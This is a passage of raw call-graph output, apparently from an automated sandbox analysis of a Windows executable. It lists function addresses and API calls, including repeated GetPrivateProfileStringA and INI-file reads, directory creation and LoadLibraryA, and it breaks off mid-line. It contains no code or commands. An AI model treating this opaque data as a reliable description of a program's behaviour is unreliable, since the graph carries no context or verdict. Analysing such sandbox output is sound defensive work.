RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76885->77153 76888 883b8 76886->76888 76889 8a497 76886->76889 76887 92b60 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76887->77153 76891 9d850 4 API calls 76888->76891 76893 32040 4 API calls 76889->76893 76890 9be70 3 API calls 76890->77056 76895 883e1 76891->76895 76892 10ce31 std::_Facet_Register 4 API calls 76892->77153 76894 8a49c 76893->76894 77281 10c05c 8 API calls 2 library calls 76894->77281 76897 10c3b3 GetSystemTimePreciseAsFileTime 76895->76897 76900 8840e 76897->76900 76898 a9be0 4 API calls 76898->77153 76899 8a4a2 77282 10c05c 8 API calls 2 library calls 76899->77282 76900->76894 76902 88419 76900->76902 76904 88439 __Mtx_unlock 76902->76904 76909 8842d GetFileAttributesA 76902->76909 76903 8a4a8 76906 32040 4 API calls 76903->76906 76911 10c3b3 GetSystemTimePreciseAsFileTime 76904->76911 76923 88453 __Mtx_unlock 76904->76923 76905 95e10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76905->77056 76908 8a4ad 76906->76908 76907 9be70 ExitProcess RtlAllocateHeap RtlFreeHeap 76907->77153 77283 10c05c 8 API calls 2 library calls 76908->77283 76909->76904 76909->76923 76910 882ae Concurrency::cancel_current_task 76913 32040 4 API calls 76910->76913 76914 8848d 76911->76914 76913->76874 76914->76899 76917 88498 CreateDirectoryA 76914->76917 76915 8a4b3 77284 10c05c 8 API calls 2 library calls 76915->77284 76916 9d850 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76916->77056 76917->76923 76919 8a4b9 76920 95b90 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76920->77056 76921 99c10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76921->77056 76936 10ce31 std::_Facet_Register 4 API calls 76923->76936 76947 89303 76923->76947 76967 892db 76923->76967 76924 8a4be 76925 95b20 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76925->77056 76926 881fa Concurrency::cancel_current_task 76930 32040 4 API calls 76926->76930 76928 3c050 13 API calls 76928->76947 76929 95b20 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76929->77153 76935 88213 76930->76935 76931 95e10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76931->77153 76932 10c3b3 GetSystemTimePreciseAsFileTime 76932->77056 76933 32700 4 API calls 76933->77056 76934 8a4c4 77279 10c05c 8 API calls 2 library calls 76935->77279 76941 8850e 76936->76941 76937 9d850 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76937->77153 76939 8a4ca 76945 a9be0 4 API calls 76941->76945 76943 99c10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76943->77153 76944 88219 76948 32040 4 API calls 76944->76948 77158 88537 __Mtx_unlock 76945->77158 76946 8a4cf 76952 89398 76947->76952 76953 8a4e3 76947->76953 76954 8821e 76948->76954 76949 112f00 3 API calls 76949->77056 76950 3bf90 10 API calls 76950->77056 76959 9d850 4 API calls 76952->76959 76958 32040 4 API calls 76953->76958 76971 32700 4 API calls 76954->76971 76955 8a4d4 76956 32700 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76956->77153 76957 10c3b3 GetSystemTimePreciseAsFileTime 76957->77153 76963 8a4e8 76958->76963 76964 893be 76959->76964 76960 892bd 76962 3c010 10 API calls 76962->77153 77287 10c05c 8 API calls 2 library calls 76963->77287 76970 10c3b3 GetSystemTimePreciseAsFileTime 76964->76970 76967->76928 76967->76947 76968 8a4d9 76976 8822f 76971->76976 76972 9d660 4 API calls 76972->77056 76982 99c70 4 API calls 76976->76982 76977 99bb0 4 API calls 76977->77153 76978 8a4de 76980 112f00 ExitProcess RtlAllocateHeap RtlFreeHeap 76980->77153 76987 88244 76982->76987 76984 3bf90 10 API calls 76984->77153 76990 38920 4 API calls 76987->76990 76988 95b90 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76988->77153 77003 8825c Concurrency::cancel_current_task 76990->77003 76995 92a50 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76995->77158 76997 9d660 4 API calls 76997->77153 76998 116788 7 API calls 76998->77153 76999 92a50 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76999->77056 77009 32700 4 API calls 77003->77009 77004 32660 ExitProcess RtlAllocateHeap RtlFreeHeap 77004->77056 77006 116788 7 API calls 77006->77056 77007 92b60 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77007->77056 77012 88281 77009->77012 77013 99c70 4 API calls 77012->77013 77016 88296 77013->77016 77014 10ce31 std::_Facet_Register 4 API calls 77014->77158 77020 38920 4 API calls 77016->77020 77020->76910 77022 a9be0 4 API calls 77022->77158 77024 99ec0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77024->77056 77031 32660 ExitProcess RtlAllocateHeap RtlFreeHeap 77031->77153 77033 9be70 3 API calls 77033->77158 77042 95e10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77042->77158 77053 a0ef0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77053->77056 77055 32be0 6 API calls 77055->77056 77056->76871 77056->76874 77056->76877 77056->76879 77056->76881 77056->76884 77056->76890 77056->76905 77056->76910 77056->76916 77056->76920 77056->76921 77056->76925 77056->76932 77056->76933 77056->76949 77056->76950 77056->76972 77056->76999 77056->77004 77056->77006 77056->77007 77056->77024 77056->77053 77056->77055 77080 a0ef0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77080->77153 77091 9d850 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77091->77158 77093 a0850 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77093->77153 77094 112f00 3 API calls 77094->77158 77102 8816a 77113 32700 4 API calls 77102->77113 77103 10c3b3 GetSystemTimePreciseAsFileTime 77103->77158 77105 9d660 4 API calls 77105->77158 77111 95b20 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77111->77158 77116 8817b 77113->77116 77119 99c70 4 API calls 77116->77119 77117 95b90 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77117->77158 77121 88190 77119->77121 77125 38920 4 API calls 77121->77125 77131 881a8 Concurrency::cancel_current_task 77125->77131 77127 92b60 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77127->77158 77130 116788 7 API calls 77130->77158 77133 32700 4 API calls 77131->77133 77135 881cd 77133->77135 77136 99c70 4 API calls 77135->77136 77137 881e2 77136->77137 77139 38920 4 API calls 77137->77139 77138 99ec0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77138->77153 77139->76926 77141 a0ef0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77141->77158 77148 99ec0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77148->77158 77149 32be0 6 API calls 77149->77158 77153->76857 77153->76859 77153->76874 77153->76875 77153->76883 77153->76885 77153->76887 77153->76892 77153->76898 77153->76907 77153->76926 77153->76929 77153->76931 77153->76935 77153->76937 77153->76943 77153->76944 77153->76954 77153->76956 77153->76957 77153->76962 77153->76977 77153->76980 77153->76984 77153->76988 77153->76997 77153->76998 77153->77003 77153->77031 77153->77080 77153->77093 77153->77102 77153->77131 77153->77138 77155 32be0 6 API calls 77153->77155 77274 99dd0 77153->77274 77277 4c300 ExitProcess RtlAllocateHeap RtlFreeHeap 77153->77277 77155->77153 77158->76903 77158->76908 77158->76915 77158->76919 77158->76924 77158->76934 77158->76939 77158->76946 77158->76955 77158->76960 77158->76968 77158->76978 77158->76995 77158->77014 77158->77022 77158->77033 77158->77042 77158->77091 77158->77094 77158->77103 77158->77105 77158->77111 77158->77117 77158->77127 77158->77130 77158->77141 77158->77148 77158->77149 77275 9d660 4 API calls 77274->77275 77276 99de8 77275->77276 77276->77153 77277->77153 77278->76865 77279->76944 77280->76879 77281->76899 77282->76903 77283->76915 77284->76919 77306 83350 77316 83376 77306->77316 77307 838f6 77308 95e10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77308->77316 77313 93510 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77313->77316 77315 99ec0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77315->77316 77316->77307 77316->77308 77316->77313 77316->77315 77317 93910 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77316->77317 77318 648e0 77316->77318 77408 66590 77316->77408 77487 67660 77316->77487 77569 68c90 77316->77569 77642 6a700 77316->77642 77317->77316 77319 64916 77318->77319 77320 93c80 4 API calls 77319->77320 77321 64937 77320->77321 77322 93c50 4 API calls 77321->77322 77323 64960 77322->77323 77324 99ec0 4 API calls 77323->77324 77325 64985 __fread_nolock 77324->77325 77326 99c10 4 API calls 77325->77326 77327 649d0 77326->77327 77328 99b50 4 API calls 77327->77328 77329 64a22 77328->77329 77718 4d90e85 77329->77718 77722 4d90e8b 77329->77722 77726 4d90f40 77329->77726 77730 4d90ecf 77329->77730 77734 4d90ee5 77329->77734 77738 4d90e82 77329->77738 77743 4d90ea5 77329->77743 77747 4d90e56 77329->77747 77754 4d90f54 77329->77754 77331 112350 3 API calls 77333 66495 77331->77333 77332 66330 77332->77331 77334 6646d 77332->77334 77335 32700 4 API calls 77333->77335 77334->77316 77336 664ac 77335->77336 77337 99c70 4 API calls 77336->77337 77338 664c1 77337->77338 77339 38920 4 API calls 77338->77339 77340 664d9 Concurrency::cancel_current_task 77339->77340 77341 32700 4 API calls 77340->77341 77342 66504 77341->77342 77343 99c70 4 API calls 77342->77343 77344 66519 77343->77344 77345 38920 4 API calls 77344->77345 77346 66531 Concurrency::cancel_current_task 77345->77346 77819 10c05c 8 API calls 2 library calls 77346->77819 77348 95e10 4 API calls 77385 64a46 __fread_nolock __Mtx_unlock 77348->77385 77349 6654b 77350 32040 4 API calls 77349->77350 77352 66550 77350->77352 77351 3b8e0 9 API calls 77351->77385 77353 44540 14 API calls 77353->77385 77354 9a250 5 API calls 77354->77385 77356 44970 10 API calls 77356->77385 77358 cf8f0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77358->77385 77359 92b60 4 API calls 77359->77385 77360 97810 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77360->77385 77361 9d850 4 API calls 77361->77385 77362 cf0e0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77362->77385 77363 10c3b3 GetSystemTimePreciseAsFileTime 77363->77385 77364 93c80 4 API calls 77364->77385 77366 99d70 4 API calls 77366->77385 77367 9a750 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77367->77385 77368 99bb0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77368->77385 77369 93910 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77369->77385 77370 32660 ExitProcess RtlAllocateHeap RtlFreeHeap 77370->77385 77371 99ec0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77371->77385 77372 93230 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77372->77385 77373 3bf90 10 API calls 77373->77385 77374 99c70 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77374->77385 77375 99b50 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77375->77385 77376 3bf00 7 API calls 77376->77385 77377 112f00 ExitProcess RtlAllocateHeap RtlFreeHeap 77377->77385 77378 9cfd0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77378->77385 77379 32700 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77379->77385 77380 9a000 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77380->77385 77381 10ce31 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap std::_Facet_Register 77381->77385 77382 116788 7 API calls 77382->77385 77383 32830 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77383->77385 77384 93640 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77384->77385 77385->77332 77385->77333 77385->77340 77385->77346 77385->77348 77385->77349 77385->77351 77385->77353 77385->77354 77385->77356 77385->77358 77385->77359 77385->77360 77385->77361 77385->77362 77385->77363 77385->77364 77385->77366 77385->77367 77385->77368 77385->77369 77385->77370 77385->77371 77385->77372 77385->77373 77385->77374 77385->77375 77385->77376 77385->77377 77385->77378 77385->77379 77385->77380 77385->77381 77385->77382 77385->77383 77385->77384 77386 11ad08 6 API calls 77385->77386 77387 92a50 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77385->77387 77757 11a68e 77385->77757 77771 4d40ae2 77385->77771 77775 4d40b78 77385->77775 77779 4d40b67 77385->77779 77783 4d40ba5 77385->77783 77787 4d40bf2 77385->77787 77791 4d40b2e 77385->77791 77795 4d40b13 77385->77795 77799 4d40bfa 77385->77799 77802 4d40b4b 77385->77802 77806 4d40be4 77385->77806 77810 4d40bd4 77385->77810 77814 f28f0 77385->77814 77817 9a860 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap std::_Facet_Register 77385->77817 77818 cefd0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77385->77818 77386->77385 77387->77385 77409 665c6 77408->77409 77410 97810 4 API calls 77409->77410 77411 665eb 77410->77411 77412 93c50 4 API calls 77411->77412 77413 66610 77412->77413 77414 99ec0 4 API calls 77413->77414 77415 6664c __fread_nolock 77414->77415 77415->77415 77416 67590 77415->77416 77418 9d850 4 API calls 77415->77418 77417 32040 4 API calls 77416->77417 77419 67595 77417->77419 77421 666ef 77418->77421 77420 32040 4 API calls 77419->77420 77440 674bc 77420->77440 77421->77419 77421->77421 77424 9d850 4 API calls 77421->77424 77422 112350 3 API calls 77423 6759f 77422->77423 77426 32700 4 API calls 77423->77426 77425 6677f 77424->77425 77478 4d90e8b GetPrivateProfileStringA 77425->77478 77479 4d90ecf GetPrivateProfileStringA 77425->77479 77480 4d90f40 GetPrivateProfileStringA 77425->77480 77481 4d90e82 GetPrivateProfileStringA 77425->77481 77482 4d90ee5 GetPrivateProfileStringA 77425->77482 77483 4d90e85 GetPrivateProfileStringA 77425->77483 77484 4d90ea5 GetPrivateProfileStringA 77425->77484 77485 4d90f54 GetPrivateProfileStringA 77425->77485 77486 4d90e56 2 API calls 77425->77486 77427 675b6 77426->77427 77428 99c70 4 API calls 77427->77428 77429 675cb 77428->77429 77430 38920 4 API calls 77429->77430 77432 675e3 Concurrency::cancel_current_task 77430->77432 77431 11a68e 4 API calls 77464 667b1 __fread_nolock 77431->77464 77433 32700 4 API calls 77432->77433 77434 6760b 77433->77434 77435 99c70 4 API calls 77434->77435 77436 67620 77435->77436 77437 38920 4 API calls 77436->77437 77439 67638 Concurrency::cancel_current_task 77437->77439 77438 6756d 77438->77316 77440->77422 77440->77438 77441 9d850 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77441->77464 77442 95b20 4 API calls 77442->77464 77443 95e10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77443->77464 77444 112f00 3 API calls 77444->77464 77445 3c430 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77445->77464 77446 116788 7 API calls 77446->77464 77447 98000 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap RtlAllocateHeap 77447->77464 77448 959f0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77448->77464 77449 97810 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77449->77464 77450 93c50 4 API calls 77450->77464 77451 10ce31 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap std::_Facet_Register 77451->77464 77453 44540 14 API calls 77453->77464 77454 f27b0 3 API calls 77454->77464 77455 99ec0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77455->77464 77456 93230 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77456->77464 77457 44970 10 API calls 77457->77464 77458 cf0e0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77458->77464 77461 cbfb0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77461->77464 77462 bda80 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77462->77464 77463 32830 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77463->77464 77464->77416 77464->77423 77464->77431 77464->77432 77464->77440 77464->77441 77464->77442 77464->77443 77464->77444 77464->77445 77464->77446 77464->77447 77464->77448 77464->77449 77464->77450 77464->77451 77464->77453 77464->77454 77464->77455 77464->77456 77464->77457 77464->77458 77464->77461 77464->77462 77464->77463 77465 9cfd0 4 API calls 77464->77465 77467 4d40bd4 BaseDllReadWriteIniFile 77464->77467 77468 4d40be4 BaseDllReadWriteIniFile 77464->77468 77469 4d40ba5 BaseDllReadWriteIniFile 77464->77469 77470 4d40b67 BaseDllReadWriteIniFile 77464->77470 77471 4d40ae2 BaseDllReadWriteIniFile 77464->77471 77472 4d40bf2 BaseDllReadWriteIniFile 77464->77472 77473 4d40b13 BaseDllReadWriteIniFile 77464->77473 77474 4d40b2e BaseDllReadWriteIniFile 77464->77474 77475 4d40b78 BaseDllReadWriteIniFile 77464->77475 77476 4d40bfa BaseDllReadWriteIniFile 77464->77476 77477 4d40b4b BaseDllReadWriteIniFile 77464->77477 77825 979e0 77464->77825 77837 93510 77464->77837 77853 cdee0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77464->77853 77854 ce0f0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77464->77854 77465->77464 77467->77464 77468->77464 77469->77464 77470->77464 77471->77464 77472->77464 77473->77464 77474->77464 77475->77464 77476->77464 77477->77464 77478->77464 77479->77464 77480->77464 77481->77464 77482->77464 77483->77464 77484->77464 77485->77464 77486->77464 77488 67696 77487->77488 77489 97810 4 API calls 77488->77489 77490 676bb 77489->77490 77491 93c50 4 API calls 77490->77491 77492 676e3 77491->77492 77493 99ec0 4 API calls 77492->77493 77494 67728 __fread_nolock 77493->77494 77494->77494 77495 68b8f 77494->77495 77497 9d850 4 API calls 77494->77497 77496 32040 4 API calls 77495->77496 77498 68b94 77496->77498 77501 677e0 77497->77501 77499 32040 4 API calls 77498->77499 77519 68ab7 77499->77519 77500 112350 3 API calls 77502 68b9e 77500->77502 77501->77498 77501->77501 77504 9d850 4 API calls 77501->77504 77858 993d0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77502->77858 77506 6786f 77504->77506 77505 68ba3 77507 32700 4 API calls 77505->77507 77560 4d90e8b GetPrivateProfileStringA 77506->77560 77561 4d90ecf GetPrivateProfileStringA 77506->77561 77562 4d90f40 GetPrivateProfileStringA 77506->77562 77563 4d90e82 GetPrivateProfileStringA 77506->77563 77564 4d90ee5 GetPrivateProfileStringA 77506->77564 77565 4d90e85 GetPrivateProfileStringA 77506->77565 77566 4d90ea5 GetPrivateProfileStringA 77506->77566 77567 4d90f54 GetPrivateProfileStringA 77506->77567 77568 4d90e56 2 API calls 77506->77568 77508 68bba 77507->77508 77509 99c70 4 API calls 77508->77509 77510 68bcf 77509->77510 77511 38920 4 API calls 77510->77511 77513 68be7 Concurrency::cancel_current_task 77511->77513 77512 11a68e 4 API calls 77548 678a1 __fread_nolock 77512->77548 77514 32700 4 API calls 77513->77514 77515 68c12 77514->77515 77516 99c70 4 API calls 77515->77516 77518 68c27 77516->77518 77517 68b6c 77517->77316 77520 38920 4 API calls 77518->77520 77519->77500 77519->77517 77521 68c3f Concurrency::cancel_current_task 77520->77521 77522 9d850 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77522->77548 77523 95b20 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77523->77548 77524 112f00 3 API calls 77524->77548 77525 3c430 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77525->77548 77526 116788 7 API calls 77526->77548 77527 98000 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap RtlAllocateHeap 77527->77548 77528 959f0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77528->77548 77529 97810 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77529->77548 77530 93c50 4 API calls 77530->77548 77531 979e0 4 API calls 77531->77548 77532 44540 14 API calls 77532->77548 77533 99ec0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77533->77548 77534 f27b0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77534->77548 77535 44970 10 API calls 77535->77548 77538 cbfb0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77538->77548 77539 32830 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77539->77548 77540 99c70 4 API calls 77540->77548 77541 bda80 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77541->77548 77542 10ce31 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap std::_Facet_Register 77542->77548 77543 9cfd0 4 API calls 77543->77548 77544 95e10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77544->77548 77545 93510 4 API calls 77545->77548 77546 93230 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77546->77548 77547 cf0e0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77547->77548 77548->77495 77548->77502 77548->77505 77548->77512 77548->77513 77548->77519 77548->77522 77548->77523 77548->77524 77548->77525 77548->77526 77548->77527 77548->77528 77548->77529 77548->77530 77548->77531 77548->77532 77548->77533 77548->77534 77548->77535 77548->77538 77548->77539 77548->77540 77548->77541 77548->77542 77548->77543 77548->77544 77548->77545 77548->77546 77548->77547 77549 4d40bd4 BaseDllReadWriteIniFile 77548->77549 77550 4d40be4 BaseDllReadWriteIniFile 77548->77550 77551 4d40ba5 BaseDllReadWriteIniFile 77548->77551 77552 4d40b67 BaseDllReadWriteIniFile 77548->77552 77553 4d40ae2 BaseDllReadWriteIniFile 77548->77553 77554 4d40bf2 BaseDllReadWriteIniFile 77548->77554 77555 4d40b13 BaseDllReadWriteIniFile 77548->77555 77556 4d40b2e BaseDllReadWriteIniFile 77548->77556 77557 4d40b78 BaseDllReadWriteIniFile 77548->77557 77558 4d40bfa BaseDllReadWriteIniFile 77548->77558 77559 4d40b4b BaseDllReadWriteIniFile 77548->77559 77856 cdee0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77548->77856 77857 ce0f0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77548->77857 77549->77548 77550->77548 77551->77548 77552->77548 77553->77548 77554->77548 77555->77548 77556->77548 77557->77548 77558->77548 77559->77548 77560->77548 77561->77548 77562->77548 77563->77548 77564->77548 77565->77548 77566->77548 77567->77548 77568->77548 77570 68cc6 77569->77570 77571 97810 4 API calls 77570->77571 77572 68ceb 77571->77572 77573 93c50 4 API calls 77572->77573 77574 68d13 77573->77574 77575 99ec0 4 API calls 77574->77575 77576 68d4d __fread_nolock 77575->77576 77576->77576 77577 6a68a 77576->77577 77578 9d850 4 API calls 77576->77578 77579 32040 4 API calls 77577->77579 77582 68e05 77578->77582 77580 6a68f 77579->77580 77581 32040 4 API calls 77580->77581 77595 6a5b6 77581->77595 77582->77580 77582->77582 77585 9d850 4 API calls 77582->77585 77583 112350 3 API calls 77584 6a699 77583->77584 77587 32700 4 API calls 77584->77587 77586 68e98 77585->77586 77633 4d90e8b GetPrivateProfileStringA 77586->77633 77634 4d90ecf GetPrivateProfileStringA 77586->77634 77635 4d90f40 GetPrivateProfileStringA 77586->77635 77636 4d90e82 GetPrivateProfileStringA 77586->77636 77637 4d90ee5 GetPrivateProfileStringA 77586->77637 77638 4d90e85 GetPrivateProfileStringA 77586->77638 77639 4d90ea5 GetPrivateProfileStringA 77586->77639 77640 4d90f54 GetPrivateProfileStringA 77586->77640 77641 4d90e56 2 API calls 77586->77641 77588 6a6b0 77587->77588 77589 99c70 4 API calls 77588->77589 77590 6a6c5 77589->77590 77591 38920 4 API calls 77590->77591 77592 6a6dd Concurrency::cancel_current_task 77591->77592 77593 11a68e 4 API calls 77621 68eca __fread_nolock 77593->77621 77594 6a667 77594->77316 77595->77583 77595->77594 77596 9d850 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77596->77621 77597 95b20 4 API calls 77597->77621 77598 95e10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77598->77621 77599 3c430 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77599->77621 77600 112f00 3 API calls 77600->77621 77601 116788 7 API calls 77601->77621 77602 98000 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap RtlAllocateHeap 77602->77621 77603 959f0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77603->77621 77604 93c50 4 API calls 77604->77621 77605 979e0 4 API calls 77605->77621 77606 44540 14 API calls 77606->77621 77607 f27b0 3 API calls 77607->77621 77608 93230 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77608->77621 77609 44970 10 API calls 77609->77621 77610 cf0e0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77610->77621 77611 97810 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77611->77621 77614 cbfb0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77614->77621 77615 99ec0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77615->77621 77616 11a9d6 4 API calls 77616->77621 77617 bda80 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77617->77621 77618 10ce31 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap std::_Facet_Register 77618->77621 77619 32830 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77619->77621 77620 93510 4 API calls 77620->77621 77621->77577 77621->77584 77621->77593 77621->77595 77621->77596 77621->77597 77621->77598 77621->77599 77621->77600 77621->77601 77621->77602 77621->77603 77621->77604 77621->77605 77621->77606 77621->77607 77621->77608 77621->77609 77621->77610 77621->77611 77621->77614 77621->77615 77621->77616 77621->77617 77621->77618 77621->77619 77621->77620 77622 4d40bd4 BaseDllReadWriteIniFile 77621->77622 77623 4d40be4 BaseDllReadWriteIniFile 77621->77623 77624 4d40ba5 BaseDllReadWriteIniFile 77621->77624 77625 4d40b67 BaseDllReadWriteIniFile 77621->77625 77626 4d40ae2 BaseDllReadWriteIniFile 77621->77626 77627 4d40bf2 BaseDllReadWriteIniFile 77621->77627 77628 4d40b13 BaseDllReadWriteIniFile 77621->77628 77629 4d40b2e BaseDllReadWriteIniFile 77621->77629 77630 4d40b78 BaseDllReadWriteIniFile 77621->77630 77631 4d40bfa BaseDllReadWriteIniFile 77621->77631 77632 4d40b4b BaseDllReadWriteIniFile 77621->77632 77859 cdee0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77621->77859 77860 ce0f0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77621->77860 77622->77621 77623->77621 77624->77621 77625->77621 77626->77621 77627->77621 77628->77621 77629->77621 77630->77621 77631->77621 77632->77621 77633->77621 77634->77621 77635->77621 77636->77621 77637->77621 77638->77621 77639->77621 77640->77621 77641->77621 77643 6a736 77642->77643 77644 97810 4 API calls 77643->77644 77645 6a75b 77644->77645 77646 93c50 4 API calls 77645->77646 77647 6a783 77646->77647 77648 99ec0 4 API calls 77647->77648 77649 6a7bc __fread_nolock 77648->77649 77649->77649 77650 6b98f 77649->77650 77652 9d850 4 API calls 77649->77652 77651 32040 4 API calls 77650->77651 77653 6b994 77651->77653 77656 6a874 77652->77656 77654 32040 4 API calls 77653->77654 77669 6b8bb 77654->77669 77655 112350 3 API calls 77657 6b99e 77655->77657 77656->77653 77656->77656 77658 9d850 4 API calls 77656->77658 77659 32700 4 API calls 77657->77659 77660 6a8ff 77658->77660 77661 6b9b5 77659->77661 77698 4d90e8b GetPrivateProfileStringA 77660->77698 77699 4d90ecf GetPrivateProfileStringA 77660->77699 77700 4d90f40 GetPrivateProfileStringA 77660->77700 77701 4d90e82 GetPrivateProfileStringA 77660->77701 77702 4d90ee5 GetPrivateProfileStringA 77660->77702 77703 4d90e85 GetPrivateProfileStringA 77660->77703 77704 4d90ea5 GetPrivateProfileStringA 77660->77704 77705 4d90f54 GetPrivateProfileStringA 77660->77705 77706 4d90e56 2 API calls 77660->77706 77662 99c70 4 API calls 77661->77662 77663 6b9ca 77662->77663 77664 38920 4 API calls 77663->77664 77666 6b9e2 Concurrency::cancel_current_task 77664->77666 77665 11a68e 4 API calls 77696 6a931 __fread_nolock __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 77665->77696 77667 6ba3e LoadLibraryA 77666->77667 77678 6ba5c 77666->77678 77667->77678 77668 6b96c 77668->77316 77669->77655 77669->77668 77670 9d850 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77670->77696 77671 95e10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77671->77696 77672 112f00 3 API calls 77672->77696 77673 3c430 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77673->77696 77674 116788 7 API calls 77674->77696 77675 98000 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap RtlAllocateHeap 77675->77696 77676 959f0 RtlAllocateHeap 